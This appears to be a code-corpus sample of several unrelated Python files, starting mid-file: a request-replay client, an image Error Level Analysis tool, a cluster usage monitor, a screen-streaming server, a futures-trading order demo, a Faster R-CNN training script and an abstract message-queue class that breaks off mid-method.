t = threading.Thread(target=recv_response, args=[n])
t.daemon = True
t.start()

requests_loc = os.path.join(
    config_general.get("node", "ledger_location"),
    "reqs.dat"
)
m = open(requests_loc, "rb").read()
client_logger.info("Loaded Messages")
client_logger.info("Starting send for bufflen %s" % len(m))
sock_list = []

start_time = time.time()
# Each request is framed as a 4-byte big-endian length prefix + payload.
while len(m) > 0:
    b = m[:4]
    try:
        size = struct.unpack("!I", b)[0]
    except struct.error:
        # BUG FIX: was `pass`, which silently reused the previous `size`
        # on a truncated trailing frame and could loop forever / resend
        # garbage.  A short prefix means no complete frame remains.
        break
    for ip, port in RL:
        try:
            r = socks.socksocket()
            r.connect((ip, port))
            chunk = m[:size + 4]
            client_logger.info(
                "sending chunk of length %s over to replica set" % len(chunk))
            r.send(chunk)
            del chunk
            sock_list.append(r)
            r.close()
        except Exception as e:  # broad catch: one bad replica must not stop the replay
            client_logger.error("failed to send to [%s:%s] due to %s" %
                                (ip, port, e))
    m = m[size + 4:]

client_logger.info("Done sending... wait for receives")
while True:
    time.sleep(1)
    if kill_flag:
        # give laggy requests some time to show up
        time.sleep(1)
        sys.exit()
|
ela.py | #!/usr/bin/python
from __future__ import print_function
from PIL import Image, ImageChops, ImageEnhance
import sys, os
import threading
import argparse
# Command-line interface for the ELA batch tool.
parser = argparse.ArgumentParser(description="""
Performs Error Level Analysis over a directory of images
""")
parser.add_argument('--dir', dest='directory', required=True,
                    help='path to the directory containing the images')
# BUG FIX: `type=int` added — argparse delivers CLI values as strings, and a
# string quality would be handed straight to PIL's JPEG encoder.
parser.add_argument('--quality', dest='quality', type=int,
                    help='quality used by the jpeg crompression alg.',
                    default=90)

# Working-file extensions and output directory name.
TMP_EXT = ".tmp_ela.jpg"
ELA_EXT = ".ela.png"
SAVE_REL_DIR = "ELA"

# Worker threads spawned by main(); joined before exit.
threads = []
# JPEG re-save quality; overwritten from --quality in main().
quality = 90
def ela(fname, orig_dir, save_dir):
    """
    Generates an ELA image on save_dir.

    Re-saves the image as JPEG at the module-level `quality`, takes the
    per-channel difference against the original, and brightens it so the
    largest difference maps to 255.

    Params:
        fname: filename w/out path
        orig_dir: origin path
        save_dir: save path
    """
    basename, ext = os.path.splitext(fname)
    org_fname = os.path.join(orig_dir, fname)
    tmp_fname = os.path.join(save_dir, basename + TMP_EXT)
    ela_fname = os.path.join(save_dir, basename + ELA_EXT)

    im = Image.open(org_fname)
    im.save(tmp_fname, 'JPEG', quality=quality)

    tmp_fname_im = Image.open(tmp_fname)
    ela_im = ImageChops.difference(im, tmp_fname_im)
    extrema = ela_im.getextrema()
    max_diff = max([ex[1] for ex in extrema])
    # BUG FIX: if recompression is lossless (identical images), max_diff is 0
    # and the scale computation raised ZeroDivisionError.
    if max_diff == 0:
        max_diff = 1
    scale = 255.0 / max_diff

    ela_im = ImageEnhance.Brightness(ela_im).enhance(scale)
    ela_im.save(ela_fname)
    os.remove(tmp_fname)
def main():
    """Parse args, derive the output directory, and run ELA on every file."""
    # BUG FIX: without this declaration the assignment below created a local
    # variable, so the --quality flag never reached ela().
    global quality

    args = parser.parse_args()
    parts = args.directory.split("/")
    dirc = parts[0]
    dirc_images = args.directory
    save = SAVE_REL_DIR
    # Rebuild the parent path and name the output dir after the last component.
    for idx in range(1, len(parts)):
        if idx + 1 == len(parts):
            # NOTE(review): "Wiht" typo preserved — changing it would change
            # the output directory name existing users may rely on.
            save = save + "Wiht" + parts[idx]
        else:
            dirc = dirc + "/" + parts[idx]

    quality = args.quality
    ela_dirc = os.path.join(dirc, save)

    print("PATH Images: "+dirc_images)
    print("PATH Final"+ela_dirc)
    print("Performing ELA on images at %s" % dirc_images)

    if not os.path.exists(ela_dirc):
        os.makedirs(ela_dirc)

    # One worker thread per file; threads are joined below.
    for d in os.listdir(dirc_images):
        #if d.endswith(".jpg") or d.endswith(".jpeg"):
        thread = threading.Thread(target=ela, args=[d, dirc_images, ela_dirc])
        threads.append(thread)
        thread.start()

    for t in threads:
        t.join()

    print("Finished!")
    print("Head to %s/%s to check the results!" % (dirc, SAVE_REL_DIR))
if __name__ == '__main__':
    main()
else:
    # This file is a command-line tool, not a library.
    print("This should'nt be imported.", file=sys.stderr)
    sys.exit(1)
|
hpc05_monitor.py | #!/usr/bin/env python
import asyncio
import operator
import os
import socket
from collections import defaultdict
from datetime import datetime
import psutil
# Peak (value, timestamp) per engine and metric, filled by _update_max_usage().
MAX_USAGE = defaultdict(dict)
# Most recent usage report per engine id, filled by collect_data().
LATEST_DATA = {}
# Set by start(); also used to detect whether monitoring is running.
START_TIME = None
def get_usage():
    """return a dict of usage info for this process"""
    from IPython import get_ipython

    hn = socket.gethostname()
    # System-wide memory percentage and CPU percentage since the last call.
    mem = psutil.virtual_memory().percent
    cpu = psutil.cpu_percent()
    return {
        # engine_id is set by ipyparallel on engine kernels; None elsewhere.
        "engine_id": getattr(get_ipython().kernel, "engine_id", None),
        "date": datetime.utcnow(),
        "cpu": cpu,
        "mem": mem,
        "hostname": hn,
        "pid": os.getpid(),
    }
def publish_data_forever(interval):
    """Forever, call get_usage and publish the data via datapub

    This will be available on all AsyncResults as `ar.data`.
    Runs in a daemon thread; setting `stop_publishing` in the interactive
    namespace stops the loop.
    """
    from threading import Thread
    import time
    import __main__ as user_ns  # the interactive namespace
    from ipyparallel.datapub import publish_data

    def main():
        while not getattr(user_ns, "stop_publishing", False):
            publish_data(get_usage())
            time.sleep(interval)

    Thread(target=main, daemon=True).start()
def collect_data(session, msg_frames):
    """Collect and deserialize messages"""
    from ipyparallel import serialize

    global LATEST_DATA
    idents, msg = session.feed_identities(msg_frames)
    try:
        msg = session.deserialize(msg, content=True)
    except Exception as e:
        # Best-effort: a malformed frame must not kill the IOPub callback.
        print(e)
        return
    if msg["header"]["msg_type"] != "data_message":
        return
    # show the contents of data messages:
    data, remainder = serialize.deserialize_object(msg["buffers"])
    LATEST_DATA[data["engine_id"]] = data
def start(client, interval=5):
    """Begin collecting usage data from an ipyparallel `client`.

    Wires collect_data into the client's IOPub stream and schedules the
    max-usage updater on the running event loop.  Returns the asyncio Task.
    """
    global START_TIME
    from functools import partial

    client._iopub_stream.on_recv(partial(collect_data, client.session))
    ioloop = asyncio.get_event_loop()
    START_TIME = datetime.utcnow()
    return ioloop.create_task(_update_max_usage(interval))
async def _update_max_usage(interval):
    """Every `interval` seconds, fold LATEST_DATA into MAX_USAGE.

    MAX_USAGE[engine][metric] holds the (value, timestamp) pair with the
    largest value seen so far.
    """
    while True:
        for i, info in LATEST_DATA.items():
            for k in ["cpu", "mem"]:
                # Compare on the value only; keep the timestamp of the peak.
                MAX_USAGE[i][k] = max(
                    (info[k], info["date"]),
                    MAX_USAGE[i].get(k, (0, None)),
                    key=operator.itemgetter(0),
                )
        await asyncio.sleep(interval)
def print_usage(data=None):
    """Nicely print one usage report per engine (defaults to LATEST_DATA)."""
    if data is None:
        data = LATEST_DATA
    header = " {:2s} {:20s} {:32s} {:3s}% {:3s}%".format(
        "id", "hostname", "date", "CPU", "MEM")
    print(header)
    row_fmt = "{:3.0f} {:20s} {:32s} {:3.0f}% {:3.0f}%"
    for _eid, rep in sorted(data.items()):
        print(row_fmt.format(
            rep["engine_id"],
            rep["hostname"],
            rep["date"].isoformat(),
            rep["cpu"],
            rep["mem"],
        ))
def print_max_usage():
    """Print the peak mem/cpu usage recorded so far and when each occurred."""
    if START_TIME is None:
        # BUG FIX: the two adjacent literals rendered as `using"hpc05...`;
        # a separating space was missing.
        raise Exception(
            "Start the hpc05_monitor first by using "
            '"hpc05_monitor.start(client)".'
        )
    for k in ["mem", "cpu"]:
        # Engine with the largest recorded value for this metric.
        i, info = max(MAX_USAGE.items(), key=lambda x: x[1][k][0])
        usage, date = info[k]
        # BUG FIX: report how long ago the *peak* happened; previously this
        # measured time since monitoring started, contradicting the message.
        time_ago = (datetime.utcnow() - date).total_seconds()
        print(
            f"Max {k} usage of {usage:.2f}% on engine {i}"
            f" at {date.isoformat()}, {time_ago:.0f} seconds ago."
        )
# When run as a script (e.g. on an engine), publish this process's usage.
if __name__ == "__main__":
    publish_data_forever(interval=5)
|
server.py | from socket import socket
from threading import Thread
from zlib import compress
from mss import mss
# Capture resolution; the divisor of 1 keeps the native 1366x768 size
# (increase it to downscale the grabbed region).
WIDTH = int(1366 / 1)
HEIGHT = int(768 / 1)
def send_screenshot(conn):
    """Capture the screen in a loop and stream it over `conn`.

    Wire format per frame: one byte giving the byte-length of the size
    field, then the payload size (big-endian), then the zlib-compressed
    BGRA payload itself.
    """
    grab_area = {'top': 0, 'left': 0, 'width': WIDTH, 'height': HEIGHT}
    with mss() as sct:
        while True:
            frame = sct.grab(grab_area)
            payload = compress(frame.bgra, 1)
            size = len(payload)
            size_len = (size.bit_length() + 7) // 8
            conn.send(bytes([size_len]))
            conn.send(size.to_bytes(size_len, 'big'))
            conn.sendall(payload)
def main(host='', port=5000):
    """Listen on (host, port) and spawn one streaming thread per client."""
    listener = socket()
    listener.bind((host, port))
    try:
        listener.listen(5)
        print('Server started.')
        while True:
            conn, addr = listener.accept()
            print('Client connected IP:', addr)
            worker = Thread(target=send_screenshot, args=(conn,))
            worker.start()
    finally:
        # Always release the listening socket, even on Ctrl-C.
        listener.close()
# Start the screenshot server when run directly.
if __name__ == '__main__':
    main()
|
send_order_demo.py | from threading import Thread
from time import sleep
from ctpbee import CtpbeeApi, helper, CtpBee
from ctpbee.constant import ContractData, LogData, TickData, BarData, OrderType, Offset, OrderData, SharedData, \
TradeData, PositionData, Direction, AccountData
class Demo(CtpbeeApi):
    """Example CtpbeeApi extension: subscribes to rb1910 and sends a limit
    order on every generated bar.

    Data recorded by the bound CtpBee app lives under self.app.recorder.
    """
    # Contracts this strategy cares about.
    contract_set = set(["rb1910"])

    def on_contract(self, contract: ContractData):
        """Handle pushed contract info: subscribe to contracts we track."""
        if contract.symbol in self.contract_set:
            self.app.subscribe(contract.symbol)

    def on_log(self, log: LogData):
        """Handle log info; only needed for special use cases."""
        pass

    def on_tick(self, tick: TickData) -> None:
        """Handle pushed ticks."""
        pass

    def on_bar(self, bar: BarData) -> None:
        """Handle bars generated by ctpbee: open a long limit order at the bar high."""
        # Build the order request.
        req = helper.generate_order_req_by_var(symbol=bar.symbol, exchange=bar.exchange, price=bar.high_price,
                                               direction=Direction.LONG, type=OrderType.LIMIT, volume=3,
                                               offset=Offset.OPEN)
        # Send the order through the bound app.
        id = self.app.send_order(req)
        print("返回id", id)

    def on_order(self, order: OrderData) -> None:
        """Order status callback."""
        print("order", order)

    def on_shared(self, shared: SharedData) -> None:
        pass

    def on_trade(self, trade: TradeData) -> None:
        """Trade (fill) callback."""
        print("成交", trade)

    def on_position(self, position: PositionData) -> None:
        """Position callback."""

    def on_account(self, account: AccountData) -> None:
        """Account info callback."""
def letsgo():
    """Wire up a CtpBee app with the Demo extension and start it.

    Also spawns a daemon thread that periodically polls position and
    account information, since CTP pushes those only on request.
    """
    app = CtpBee(name="demo", import_name=__name__)
    # Build the strategy extension.
    demo = Demo("test")
    # Multiple extension classes may be instantiated and registered freely.
    app.add_extension(demo)
    app.config.from_json("config.json")
    app.start()

    def query(interval=1):
        # Poll forever; `app` is read from the enclosing scope
        # (the previous `nonlocal` declaration was unnecessary for reads).
        while True:
            app.query_position()
            sleep(interval)
            app.query_account()
            sleep(interval)

    # Separate daemon thread for the periodic position/account queries.
    p = Thread(target=query, args=(2,))
    # FIX: Thread.setDaemon() is deprecated; set the attribute directly.
    p.daemon = True
    p.start()
# Demo entry point.
if __name__ == '__main__':
    letsgo()
|
train_faster_rcnn_alt_opt.py | #!/usr/bin/env python
# --------------------------------------------------------
# Faster R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
"""Train a Faster R-CNN network using alternating optimization.
This tool implements the alternating optimization algorithm described in our
NIPS 2015 paper ("Faster R-CNN: Towards Real-time Object Detection with Region
Proposal Networks." Shaoqing Ren, Kaiming He, Ross Girshick, Jian Sun.)
"""
import _init_paths
from fast_rcnn.train import get_training_roidb, train_net
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list, get_output_dir
from datasets.factory import get_imdb
from rpn.generate import imdb_proposals
import argparse
import pprint
import numpy as np
import sys, os
import multiprocessing as mp
import cPickle
import shutil
def parse_args():
    """
    Parse input arguments

    Returns the argparse namespace; exits with usage when called with no
    arguments at all.
    """
    parser = argparse.ArgumentParser(description='Train a Faster R-CNN network')
    parser.add_argument('--gpu', dest='gpu_id',
                        help='GPU device id to use [0]',
                        default=0, type=int)
    parser.add_argument('--net_name', dest='net_name',
                        help='network name (e.g., "ZF")',
                        default=None, type=str)
    parser.add_argument('--weights', dest='pretrained_model',
                        help='initialize with pretrained model weights',
                        default=None, type=str)
    parser.add_argument('--cfg', dest='cfg_file',
                        help='optional config file',
                        default=None, type=str)
    parser.add_argument('--imdb', dest='imdb_name',
                        help='dataset to train on',
                        default='voc_2007_trainval', type=str)
    # REMAINDER: everything after --set is forwarded as config overrides.
    parser.add_argument('--set', dest='set_cfgs',
                        help='set config keys', default=None,
                        nargs=argparse.REMAINDER)

    # With no arguments, print usage instead of training with all defaults.
    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)

    args = parser.parse_args()
    return args
def get_roidb(imdb_name, rpn_file=None):
    """Load an imdb by name and build its training roidb.

    If `rpn_file` is given it is installed as the imdb's proposal source.
    Returns (roidb, imdb).
    """
    imdb = get_imdb(imdb_name)
    print('Loaded dataset `{:s}` for training'.format(imdb.name))
    imdb.set_proposal_method(cfg.TRAIN.PROPOSAL_METHOD)
    print('Set proposal method: {:s}'.format(cfg.TRAIN.PROPOSAL_METHOD))
    if rpn_file is not None:
        imdb.config['rpn_file'] = rpn_file
    roidb = get_training_roidb(imdb)
    return roidb, imdb
def get_solvers(net_name):
    """Return (solver paths, per-stage max iterations, RPN test prototxt)
    for the four alternating-optimization training stages."""
    # Faster R-CNN Alternating Optimization
    n = 'faster_rcnn_alt_opt'
    # Solver for each training stage
    stage_files = ['stage1_rpn_solver60k80k.pt',
                   'stage1_fast_rcnn_solver30k40k.pt',
                   'stage2_rpn_solver60k80k.pt',
                   'stage2_fast_rcnn_solver30k40k.pt']
    solvers = [os.path.join(cfg.MODELS_DIR, net_name, n, fname)
               for fname in stage_files]
    # Iterations for each training stage
    max_iters = [80000, 40000, 80000, 40000]
    # max_iters = [100, 100, 100, 100]
    # Test prototxt for the RPN
    rpn_test_prototxt = os.path.join(
        cfg.MODELS_DIR, net_name, n, 'rpn_test.pt')
    return solvers, max_iters, rpn_test_prototxt
# ------------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are discarded
# (e.g. "del net" in Python code). To work around this issue, each training
# stage is executed in a separate process using multiprocessing.Process.
# ------------------------------------------------------------------------------
def _init_caffe(cfg):
    """Initialize pycaffe in a training process.

    Seeds numpy and caffe RNGs from cfg.RNG_SEED for reproducibility and
    selects GPU mode on device cfg.GPU_ID for this process.

    :param cfg: the Fast R-CNN config object passed into the worker
    """
    import caffe
    # fix the random seeds (numpy and caffe) for reproducibility
    np.random.seed(cfg.RNG_SEED)
    caffe.set_random_seed(cfg.RNG_SEED)
    # set up caffe
    caffe.set_mode_gpu()
    caffe.set_device(cfg.GPU_ID)
def train_rpn(queue=None, imdb_name=None, init_model=None, solver=None,
              max_iters=None, cfg=None):
    """Train a Region Proposal Network in a separate training process.

    Runs as a multiprocessing.Process target; on completion it puts
    {'model_path': <final snapshot path>} on `queue` and deletes all
    intermediate snapshots.
    """
    # Not using any proposals, just ground-truth boxes
    cfg.TRAIN.HAS_RPN = True
    cfg.TRAIN.BBOX_REG = False  # applies only to Fast R-CNN bbox regression
    cfg.TRAIN.PROPOSAL_METHOD = 'gt'
    cfg.TRAIN.IMS_PER_BATCH = 1
    print('Init model: {}'.format(init_model))
    print('Using config:')
    pprint.pprint(cfg)
    import caffe
    _init_caffe(cfg)
    roidb, imdb = get_roidb(imdb_name)
    print('roidb len: {}'.format(len(roidb)))
    output_dir = get_output_dir(imdb)
    print('Output will be saved to `{:s}`'.format(output_dir))
    model_paths = train_net(solver, roidb, output_dir,
                            pretrained_model=init_model,
                            max_iters=max_iters)
    # Cleanup all but the final model
    for i in model_paths[:-1]:
        os.remove(i)
    rpn_model_path = model_paths[-1]
    # Send final model path through the multiprocessing queue
    queue.put({'model_path': rpn_model_path})
def rpn_generate(queue=None, imdb_name=None, rpn_model_path=None, cfg=None,
                 rpn_test_prototxt=None):
    """Use a trained RPN to generate proposals.

    Runs as a multiprocessing.Process target; pickles the proposals to
    <output_dir>/<net>_proposals.pkl and puts {'proposal_path': <pkl path>}
    on `queue`.
    """
    cfg.TEST.RPN_PRE_NMS_TOP_N = -1  # no pre NMS filtering
    cfg.TEST.RPN_POST_NMS_TOP_N = 2000  # limit top boxes after NMS
    print('RPN model: {}'.format(rpn_model_path))
    print('Using config:')
    pprint.pprint(cfg)
    import caffe
    _init_caffe(cfg)
    # NOTE: the matlab implementation computes proposals on flipped images, too.
    # We compute them on the image once and then flip the already computed
    # proposals. This might cause a minor loss in mAP (less proposal jittering).
    imdb = get_imdb(imdb_name)
    print('Loaded dataset `{:s}` for proposal generation'.format(imdb.name))
    # Load RPN and configure output directory
    rpn_net = caffe.Net(rpn_test_prototxt, rpn_model_path, caffe.TEST)
    output_dir = get_output_dir(imdb)
    print('Output will be saved to `{:s}`'.format(output_dir))
    # Generate proposals on the imdb
    rpn_proposals = imdb_proposals(rpn_net, imdb)
    # Write proposals to disk and send the proposal file path through the
    # multiprocessing queue
    rpn_net_name = os.path.splitext(os.path.basename(rpn_model_path))[0]
    rpn_proposals_path = os.path.join(
        output_dir, rpn_net_name + '_proposals.pkl')
    with open(rpn_proposals_path, 'wb') as f:
        cPickle.dump(rpn_proposals, f, cPickle.HIGHEST_PROTOCOL)
    print('Wrote RPN proposals to {}'.format(rpn_proposals_path))
    queue.put({'proposal_path': rpn_proposals_path})
def train_fast_rcnn(queue=None, imdb_name=None, init_model=None, solver=None,
                    max_iters=None, cfg=None, rpn_file=None):
    """Train a Fast R-CNN using proposals generated by an RPN.

    Runs as a multiprocessing.Process target; on completion it puts
    {'model_path': <final snapshot path>} on `queue` and deletes all
    intermediate snapshots.
    """
    cfg.TRAIN.HAS_RPN = False  # not generating proposals on-the-fly
    cfg.TRAIN.PROPOSAL_METHOD = 'rpn'  # use pre-computed RPN proposals instead
    cfg.TRAIN.IMS_PER_BATCH = 2
    print('Init model: {}'.format(init_model))
    print('RPN proposals: {}'.format(rpn_file))
    print('Using config:')
    pprint.pprint(cfg)
    import caffe
    _init_caffe(cfg)
    roidb, imdb = get_roidb(imdb_name, rpn_file=rpn_file)
    output_dir = get_output_dir(imdb)
    print('Output will be saved to `{:s}`'.format(output_dir))
    # Train Fast R-CNN
    model_paths = train_net(solver, roidb, output_dir,
                            pretrained_model=init_model,
                            max_iters=max_iters)
    # Cleanup all but the final model
    for i in model_paths[:-1]:
        os.remove(i)
    fast_rcnn_model_path = model_paths[-1]
    # Send Fast R-CNN model path over the multiprocessing queue
    queue.put({'model_path': fast_rcnn_model_path})
if __name__ == '__main__':
    args = parse_args()
    print('Called with args:')
    print(args)
    if args.cfg_file is not None:
        cfg_from_file(args.cfg_file)
    if args.set_cfgs is not None:
        cfg_from_list(args.set_cfgs)
    cfg.GPU_ID = args.gpu_id
    # --------------------------------------------------------------------------
    # Pycaffe doesn't reliably free GPU memory when instantiated nets are
    # discarded (e.g. "del net" in Python code). To work around this issue, each
    # training stage is executed in a separate process using
    # multiprocessing.Process.
    # --------------------------------------------------------------------------
    # queue for communicating results between processes
    mp_queue = mp.Queue()
    # solvers, iters, etc. for each training stage
    solvers, max_iters, rpn_test_prototxt = get_solvers(args.net_name)
    # Stage 1a: train the RPN from scratch on ground-truth boxes.
    print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
    print('Stage 1 RPN, init from ImageNet model')
    print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
    cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
    mp_kwargs = dict(
        queue=mp_queue,
        imdb_name=args.imdb_name,
        init_model=args.pretrained_model,
        solver=solvers[0],
        max_iters=max_iters[0],
        cfg=cfg)
    p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
    p.start()
    rpn_stage1_out = mp_queue.get()
    p.join()
    # Stage 1b: use the stage-1 RPN to precompute proposals on disk.
    print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
    print('Stage 1 RPN, generate proposals')
    print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
    mp_kwargs = dict(
        queue=mp_queue,
        imdb_name=args.imdb_name,
        rpn_model_path=str(rpn_stage1_out['model_path']),
        cfg=cfg,
        rpn_test_prototxt=rpn_test_prototxt)
    p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
    p.start()
    rpn_stage1_out['proposal_path'] = mp_queue.get()['proposal_path']
    p.join()
    # Stage 1c: train Fast R-CNN on those proposals, again from ImageNet.
    print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
    print('Stage 1 Fast R-CNN using RPN proposals, init from ImageNet model')
    print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
    cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
    mp_kwargs = dict(
        queue=mp_queue,
        imdb_name=args.imdb_name,
        init_model=args.pretrained_model,
        solver=solvers[1],
        max_iters=max_iters[1],
        cfg=cfg,
        rpn_file=rpn_stage1_out['proposal_path'])
    p = mp.Process(target=train_fast_rcnn, kwargs=mp_kwargs)
    p.start()
    fast_rcnn_stage1_out = mp_queue.get()
    p.join()
    # Stage 2a: retrain the RPN, initialized from the stage-1 Fast R-CNN.
    print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
    print('Stage 2 RPN, init from stage 1 Fast R-CNN model')
    print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
    cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
    mp_kwargs = dict(
        queue=mp_queue,
        imdb_name=args.imdb_name,
        init_model=str(fast_rcnn_stage1_out['model_path']),
        solver=solvers[2],
        max_iters=max_iters[2],
        cfg=cfg)
    p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
    p.start()
    rpn_stage2_out = mp_queue.get()
    p.join()
    # Stage 2b: regenerate proposals with the improved RPN.
    print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
    print('Stage 2 RPN, generate proposals')
    print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
    mp_kwargs = dict(
        queue=mp_queue,
        imdb_name=args.imdb_name,
        rpn_model_path=str(rpn_stage2_out['model_path']),
        cfg=cfg,
        rpn_test_prototxt=rpn_test_prototxt)
    p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
    p.start()
    rpn_stage2_out['proposal_path'] = mp_queue.get()['proposal_path']
    p.join()
    # Stage 2c: final Fast R-CNN training pass on the stage-2 proposals.
    print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
    print('Stage 2 Fast R-CNN, init from stage 2 RPN R-CNN model')
    print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
    cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
    mp_kwargs = dict(
        queue=mp_queue,
        imdb_name=args.imdb_name,
        init_model=str(rpn_stage2_out['model_path']),
        solver=solvers[3],
        max_iters=max_iters[3],
        cfg=cfg,
        rpn_file=rpn_stage2_out['proposal_path'])
    p = mp.Process(target=train_fast_rcnn, kwargs=mp_kwargs)
    p.start()
    fast_rcnn_stage2_out = mp_queue.get()
    p.join()
    # Create final model (just a copy of the last stage)
    final_path = os.path.join(
        os.path.dirname(fast_rcnn_stage2_out['model_path']),
        args.net_name + '_faster_rcnn_final.caffemodel')
    print('cp {} -> {}'.format(
        fast_rcnn_stage2_out['model_path'], final_path))
    shutil.copy(fast_rcnn_stage2_out['model_path'], final_path)
    print('Final model: {}'.format(final_path))
|
MessageQueue.py | # -*- coding: utf-8 -*-
"""
pip_services3_messaging.queues.MessageQeueue
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Abstract message queue implementation.
:copyright: Conceptual Vision Consulting LLC 2018-2019, see AUTHORS for more details.
:license: MIT, see LICENSE for more details.
"""
import threading
from abc import abstractmethod
from typing import Optional, List, Any
from pip_services3_commons.config import IConfigurable, NameResolver, ConfigParams
from pip_services3_commons.errors import InvalidStateException
from pip_services3_commons.refer import IReferenceable, IReferences
from pip_services3_components.auth import CredentialResolver, CredentialParams
from pip_services3_components.connect import ConnectionResolver, ConnectionParams
from pip_services3_components.count import CompositeCounters
from pip_services3_components.log import CompositeLogger
from pip_services3_messaging.queues import MessagingCapabilities, IMessageReceiver
from .IMessageQueue import IMessageQueue
from .MessageEnvelope import MessageEnvelope
class MessageQueue(IConfigurable, IReferenceable, IMessageQueue):
    """
    Abstract message queue.

    Base class that concrete message queue implementations extend. It wires up
    logging, performance counters and connection/credential resolution, and
    leaves the transport-specific operations abstract.

    ### Configuration parameters ###
        - name: name of the message queue
        - connection(s):
            - discovery_key: key to retrieve parameters from discovery service
            - protocol: connection protocol like http, https, tcp, udp
            - host: host name or IP address
            - port: port number
            - uri: resource URI or connection string with all parameters in it
        - credential(s):
            - store_key: key to retrieve parameters from credential store
            - username: user name
            - password: user password
            - access_id: application access id
            - access_key: application secret key

    ### References ###
        - `*:logger:*:*:1.0` (optional) :class:`ILogger <pip_services3_components.log.ILogger.ILogger>` components to pass log messages
        - `*:counters:*:*:1.0` (optional) :class:`ICounters <pip_services3_components.count.ICounters.ICounters>` components to pass collected measurements
        - `*:discovery:*:*:1.0` (optional) :class:`IDiscovery <pip_services3_components.connect.IDiscovery.IDiscovery>` components to discover connection(s)
        - `*:credential-store:*:*:1.0` (optional) :class:`ICredentialStore <pip_services3_components.auth.ICredentialStore.ICredentialStore>` components to lookup credential(s)
    """

    def __init__(self, name: str = None, capabilities: MessagingCapabilities = None):
        """
        Creates a new instance of the message queue.

        :param name: (optional) a queue name
        :param capabilities: (optional) a capabilities of this message queue
        """
        self._lock: threading.Lock = threading.Lock()
        self._event = threading.Event()
        self._logger: CompositeLogger = CompositeLogger()
        self._counters: CompositeCounters = CompositeCounters()
        self._connection_resolver: ConnectionResolver = ConnectionResolver()
        self._credential_resolver: CredentialResolver = CredentialResolver()
        self._name: str = name
        # When no capabilities are supplied, default to a descriptor with
        # every messaging feature disabled.
        if capabilities:
            self._capabilities: MessagingCapabilities = capabilities
        else:
            self._capabilities = MessagingCapabilities(
                False, False, False, False, False, False, False, False, False)

    def configure(self, config: ConfigParams):
        """
        Configures component by passing configuration parameters.

        :param config: configuration parameters to be set.
        """
        self._name = NameResolver.resolve(config)
        self._logger.configure(config)
        self._credential_resolver.configure(config)
        self._connection_resolver.configure(config)

    def set_references(self, references: IReferences):
        """
        Sets references to dependent components.

        :param references: references to locate the component dependencies.
        """
        self._logger.set_references(references)
        self._counters.set_references(references)
        self._credential_resolver.set_references(references)
        self._connection_resolver.set_references(references)

    @abstractmethod
    def is_open(self) -> bool:
        """
        Checks if the component is opened.

        :return: true if the component has been opened and false otherwise.
        """

    def open(self, correlation_id: Optional[str]):
        """
        Opens the component by resolving connection and credential parameters
        and delegating to :func:`_open_with_params`.

        :param correlation_id: (optional) transaction id to trace execution through call chain.
        """
        resolved_connections = self._connection_resolver.resolve_all(correlation_id)
        resolved_credential = self._credential_resolver.lookup(correlation_id)
        self._open_with_params(correlation_id, resolved_connections, resolved_credential)

    def _open_with_params(self, correlation_id: Optional[str], connections: List[ConnectionParams],
                          credential: CredentialParams):
        """
        Opens the component with given connection and credential parameters.

        :param correlation_id: (optional) transaction id to trace execution through call chain.
        :param connections: connection parameters
        :param credential: credential parameters
        """
        raise NotImplementedError('Abstract method that shall be overriden')

    def _check_open(self, correlation_id: Optional[str]):
        """
        Checks if the queue has been opened and throws an exception if it's not.

        :param correlation_id: (optional) transaction id to trace execution through call chain.
        """
        if self.is_open():
            return
        raise InvalidStateException(
            correlation_id,
            "NOT_OPENED",
            "The queue is not opened"
        )

    def get_name(self) -> str:
        """
        Gets the queue name.

        :return: the queue name, or "undefined" when no name has been set.
        """
        if self._name is None:
            return "undefined"
        return self._name

    def get_capabilities(self) -> MessagingCapabilities:
        """
        Gets the queue capabilities.

        :return: the queue's capabilities object.
        """
        return self._capabilities

    def send_as_object(self, correlation_id: Optional[str], message_type: str, message: Any):
        """
        Sends an object into the queue.

        The object is wrapped in a :class:`MessageEnvelope <pip_services3_messaging.MessageEnvelope.MessageEnvelope>` before sending.

        :param correlation_id: (optional) transaction id to trace execution through call chain.
        :param message_type: a message type
        :param message: an object value to be sent
        """
        wrapped = MessageEnvelope(correlation_id, message_type, message)
        self.send(correlation_id, wrapped)

    def begin_listen(self, correlation_id: Optional[str], receiver: IMessageReceiver):
        """
        Listens for incoming messages without blocking the current thread.

        :param correlation_id: (optional) transaction id to trace execution through call chain.
